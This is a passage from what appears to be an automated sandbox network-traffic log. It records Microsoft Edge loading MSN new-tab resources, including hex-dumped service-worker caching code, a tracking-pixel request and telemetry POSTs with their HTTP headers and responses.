                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4152INData Raw: 31 30 33 30 0d 0a 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6e 29 2c 7b 69 67 6e 6f 72 65 53 65 61 72 63 68 3a 21 30 7d 29 2c 69 3d 61 77 61 69 74 20 65 2e 6b 65 79 73 28 74 2c 72 29 3b 66 6f 72 28 63 6f 6e 73 74 20 74 20 6f 66 20 69 29 69 66 28 61 3d 3d 3d 63 28 74 2e 75 72 6c 2c 73 29 29 72 65 74 75 72 6e 20 65 2e 6d 61 74 63 68 28 74 2c 6e 29 7d 28 75 2c 72 2e 63 6c 6f 6e 65 28 29 2c 5b 22 5f 5f 57 42 5f 52 45 56 49 53 49 4f 4e 5f 5f 22 5d 2c 68 29 3a 6e 75 6c 6c 3b 74 72 79 7b 61 77 61 69 74 20 75 2e 70 75 74 28 72 2c 64 3f 6f 2e 63 6c 6f 6e 65 28 29 3a 6f 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 74 68 72 6f 77 22 51 75 6f 74 61 45 78 63 65 65 64 65 64 45 72 72 6f 72 22 3d 3d 3d 65 2e 6e
                                                                                                                                                                                                                                                                          Data Ascii: 1030bject.assign({},n),{ignoreSearch:!0}),i=await e.keys(t,r);for(const t of i)if(a===c(t.url,s))return e.match(t,n)}(u,r.clone(),["__WB_REVISION__"],h):null;try{await u.put(r,d?o.clone():o)}catch(e){if(e instanceof Error)throw"QuotaExceededError"===e.n
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8200INData Raw: 32 30 30 30 0d 0a 28 28 65 3d 3e 22 63 61 63 68 65 57 69 6c 6c 55 70 64 61 74 65 22 69 6e 20 65 29 29 7c 7c 74 68 69 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 73 68 69 66 74 28 44 29 7d 61 73 79 6e 63 20 5f 68 61 6e 64 6c 65 28 74 2c 73 29 7b 63 6f 6e 73 74 20 6e 3d 73 2e 66 65 74 63 68 41 6e 64 43 61 63 68 65 50 75 74 28 74 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 7d 29 29 3b 6c 65 74 20 61 2c 72 3d 61 77 61 69 74 20 73 2e 63 61 63 68 65 4d 61 74 63 68 28 74 29 3b 69 66 28 72 29 3b 65 6c 73 65 20 74 72 79 7b 72 3d 61 77 61 69 74 20 6e 7d 63 61 74 63 68 28 65 29 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 28 61 3d 65 29 7d 69 66 28 21 72 29 74 68 72 6f 77 20 6e 65 77 20 65 28 22 6e 6f 2d 72 65 73 70 6f 6e 73 65 22 2c 7b 75 72 6c 3a 74 2e 75
                                                                                                                                                                                                                                                                          Data Ascii: 2000((e=>"cacheWillUpdate"in e))||this.plugins.unshift(D)}async _handle(t,s){const n=s.fetchAndCachePut(t).catch((()=>{}));let a,r=await s.cacheMatch(t);if(r);else try{r=await n}catch(e){e instanceof Error&&(a=e)}if(!r)throw new e("no-response",{url:t.u
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC7791INData Raw: 31 65 36 37 0d 0a 6f 6e 6e 65 63 74 6f 72 2e 22 2c 22 2f 77 65 61 74 68 65 72 2d 63 61 72 64 2d 77 63 2e 22 2c 22 2f 77 65 6c 63 6f 6d 65 47 72 65 65 74 69 6e 67 4c 69 67 68 74 2e 22 2c 22 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6c 69 62 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6d 69 6e 5f 6a 73 2e 22 5d 2c 68 65 3d 5b 22 2f 62 61 63 6b 67 72 6f 75 6e 64 2d 67 61 6c 6c 65 72 79 2e 22 2c 22 2f 63 61 72 64 2d 61 63 74 69 6f 6e 73 2d 77 63 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 64 61 74 61 2d 63 6f 6e 6e 65 63 74 6f 72 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 73 74 6f 72 65 2e 22 2c 22 2f 63 6f 64 65 78 2d 62 69 6e 67 2d 63 68 61 74 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2d 63 73 63 6f 72 65 2e 22
                                                                                                                                                                                                                                                                          Data Ascii: 1e67onnector.","/weather-card-wc.","/welcomeGreetingLight.","/node_modules_xmlbuilder2_lib_xmlbuilder2_min_js."],he=["/background-gallery.","/card-actions-wc.","/channel-data-connector.","/channel-store.","/codex-bing-chat.","/common.","/common-cscore."
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8200INData Raw: 32 30 30 30 0d 0a 65 2e 22 29 29 7d 29 29 7d 29 29 7d 7d 63 6f 6e 73 74 20 73 74 3d 22 63 6c 69 65 6e 74 4e 61 76 43 61 63 68 65 52 65 61 64 50 65 72 66 22 2c 6e 74 3d 22 63 6c 69 65 6e 74 4e 61 76 43 61 63 68 65 64 52 65 73 70 6f 6e 73 65 41 67 65 22 2c 61 74 3d 22 63 6c 69 65 6e 74 4e 61 76 43 61 63 68 65 53 74 61 74 75 73 4d 61 70 22 2c 72 74 3d 22 63 6c 69 65 6e 74 4e 61 76 52 6f 75 74 69 6e 67 4d 6f 64 65 22 2c 69 74 3d 22 63 6c 69 65 6e 74 4e 61 76 53 74 72 61 74 65 67 79 52 6f 75 74 69 6e 67 50 65 72 66 22 2c 6f 74 3d 22 66 65 65 64 5f 64 69 73 22 2c 63 74 3d 22 73 65 63 2d 65 64 67 65 2d 6e 74 70 22 2c 6c 74 3d 22 77 69 64 67 65 74 6f 6e 6c 6f 63 6b 73 63 72 65 65 6e 22 2c 68 74 3d 22 77 69 6e 70 32 22 3b 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29
                                                                                                                                                                                                                                                                          Data Ascii: 2000e."))}))}))}}const st="clientNavCacheReadPerf",nt="clientNavCachedResponseAge",at="clientNavCacheStatusMap",rt="clientNavRoutingMode",it="clientNavStrategyRoutingPerf",ot="feed_dis",ct="sec-edge-ntp",lt="widgetonlockscreen",ht="winp2";function ut(e)
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8200INData Raw: 32 30 30 30 0d 0a 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 65 26 26 28 61 3d 65 29 7d 65 6c 73 65 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 73 77 43 61 63 68 65 45 6e 61 62 6c 65 64 20 62 75 74 20 63 61 63 68 65 64 20 72 65 73 70 6f 6e 73 65 20 6e 6f 74 20 6d 61 74 63 68 3a 20 22 2b 63 2b 22 20 55 52 4c 3a 20 22 2b 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 72 6c 29 29 3b 63 6f 6e 73 74 20 65 3d 61 77 61 69 74 20 63 61 63 68 65 73 2e 6f 70 65 6e 28 22 65 64 67 65 6e 65 78 74 2d 72 69 76 65 72 2d 56 31 22 29 2c 73 3d 61 77 61 69 74 20 65 2e 6b 65 79 73 28 29 7c 7c 5b 5d 3b 69 66 28 73 2e 6c 65 6e 67 74 68 3e 30 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 6d 61 70 28 28 65 3d 3e 65 2e 75 72 6c 29 29 3b 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: 2000catch(e){console.error(e)}e&&(a=e)}else{console.error("swCacheEnabled but cached response not match: "+c+" URL: "+(null==t?void 0:t.url));const e=await caches.open("edgenext-river-V1"),s=await e.keys()||[];if(s.length>0){const e=s.map((e=>e.url));co
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1663INData Raw: 36 37 38 0d 0a 5d 2c 64 69 72 65 63 74 6f 72 79 49 6e 64 65 78 3a 73 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 2c 63 6c 65 61 6e 55 52 4c 73 3a 6e 3d 21 30 2c 75 72 6c 4d 61 6e 69 70 75 6c 61 74 69 6f 6e 3a 61 7d 3d 7b 7d 29 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 55 52 4c 28 65 2c 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 72 2e 68 61 73 68 3d 22 22 2c 79 69 65 6c 64 20 72 2e 68 72 65 66 3b 63 6f 6e 73 74 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 3d 5b 5d 29 7b 66 6f 72 28 63 6f 6e 73 74 20 73 20 6f 66 5b 2e 2e 2e 65 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 6b 65 79 73 28 29 5d 29 74 2e 73 6f 6d 65 28 28 65 3d 3e 65 2e 74 65 73 74 28 73 29 29 29 26 26 65 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 73 29 3b 72 65 74 75 72 6e 20 65 7d
                                                                                                                                                                                                                                                                          Data Ascii: 678],directoryIndex:s="index.html",cleanURLs:n=!0,urlManipulation:a}={}){const r=new URL(e,location.href);r.hash="",yield r.href;const i=function(e,t=[]){for(const s of[...e.searchParams.keys()])t.some((e=>e.test(s)))&&e.searchParams.delete(s);return e}
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC3228INData Raw: 63 39 35 0d 0a 73 74 61 74 65 2e 63 75 72 72 65 6e 74 4e 61 76 43 6c 69 65 6e 74 49 64 3d 65 2e 72 65 73 75 6c 74 69 6e 67 43 6c 69 65 6e 74 49 64 2c 73 65 6c 66 2e 73 74 61 74 65 2e 63 6c 69 65 6e 74 4e 61 76 53 74 61 72 74 54 69 6d 65 2e 73 65 74 28 73 65 6c 66 2e 73 74 61 74 65 2e 63 75 72 72 65 6e 74 4e 61 76 43 6c 69 65 6e 74 49 64 2c 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 29 29 7d 29 29 2c 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 28 65 3d 3e 7b 69 66 28 65 2e 64 61 74 61 26 26 22 4e 41 56 5f 50 45 52 46 5f 44 41 54 41 22 3d 3d 3d 65 2e 64 61 74 61 2e 74 79 70 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 73 6f 75 72 63 65 3f 65 2e 73 6f 75 72 63 65 3a 76 6f 69 64 20 30 3b 69 66 28 74 29 7b
                                                                                                                                                                                                                                                                          Data Ascii: c95state.currentNavClientId=e.resultingClientId,self.state.clientNavStartTime.set(self.state.currentNavClientId,performance.now()))})),self.addEventListener("message",(e=>{if(e.data&&"NAV_PERF_DATA"===e.data.type){const t=e.source?e.source:void 0;if(t){
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC810INData Raw: 33 32 33 0d 0a 65 2e 62 61 73 65 50 61 67 65 45 78 70 69 72 61 74 69 6f 6e 2c 7b 63 61 63 68 65 4e 61 6d 65 3a 52 28 79 2e 62 61 73 65 29 2c 70 6c 75 67 69 6e 73 3a 5b 6e 65 77 20 69 65 28 7b 6d 61 78 41 67 65 53 65 63 6f 6e 64 73 3a 74 7c 7c 31 37 32 38 30 30 2c 70 75 72 67 65 4f 6e 51 75 6f 74 61 45 72 72 6f 72 3a 21 30 7d 29 2c 6e 65 77 20 63 65 28 7b 73 74 61 74 75 73 65 73 3a 5b 32 30 30 5d 7d 29 5d 2c 66 65 74 63 68 4f 70 74 69 6f 6e 73 3a 6e 75 6c 6c 2c 6d 61 74 63 68 4f 70 74 69 6f 6e 73 3a 6e 75 6c 6c 7d 29 29 29 29 7d 28 55 74 2e 65 78 70 65 72 69 65 6e 63 65 42 61 73 65 52 6f 75 74 65 29 3b 63 6f 6e 73 74 20 71 74 3d 5b 7b 22 72 65 76 69 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 62 75 6e 64 6c 65 73 2f 76 31 2f 65 64 67 65 43 68
                                                                                                                                                                                                                                                                          Data Ascii: 323e.basePageExpiration,{cacheName:R(y.base),plugins:[new ie({maxAgeSeconds:t||172800,purgeOnQuotaError:!0}),new ce({statuses:[200]})],fetchOptions:null,matchOptions:null}))))}(Ut.experienceBaseRoute);const qt=[{"revision":null,"url":"/bundles/v1/edgeCh


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.84990520.110.205.1194435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1261OUTGET /c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          ETag: "dda11c98eb61db1:0"
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0196AA9642C66D0E1944BFF943A46C22; domain=.msn.com; expires=Tue, 03-Feb-2026 13:55:47 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=0196AA9642C66D0E1944BFF943A46C22; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:55:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:55:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 14:05:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          14192.168.2.84991213.89.178.274435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945908&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 10861
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC10861OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 35 2e 39 30 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:45.905Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=567f92b11cff4a9081fd491426fe0a99&HASH=567f&LV=202501&V=4&LU=1736430947705; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=6bce174238484df5935865df7eac0881; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1797
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          15192.168.2.84991313.89.178.274435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1025OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 4757
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4757OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 35 2e 39 31 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:45.913Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=765cb6d2be6a4f74950e3021e29532f3&HASH=765c&LV=202501&V=4&LU=1736430947738; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=9e3425f3cc5145bfb14bcd1a72d22abc; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1825
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.84992113.89.178.274435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946567&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 5391
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
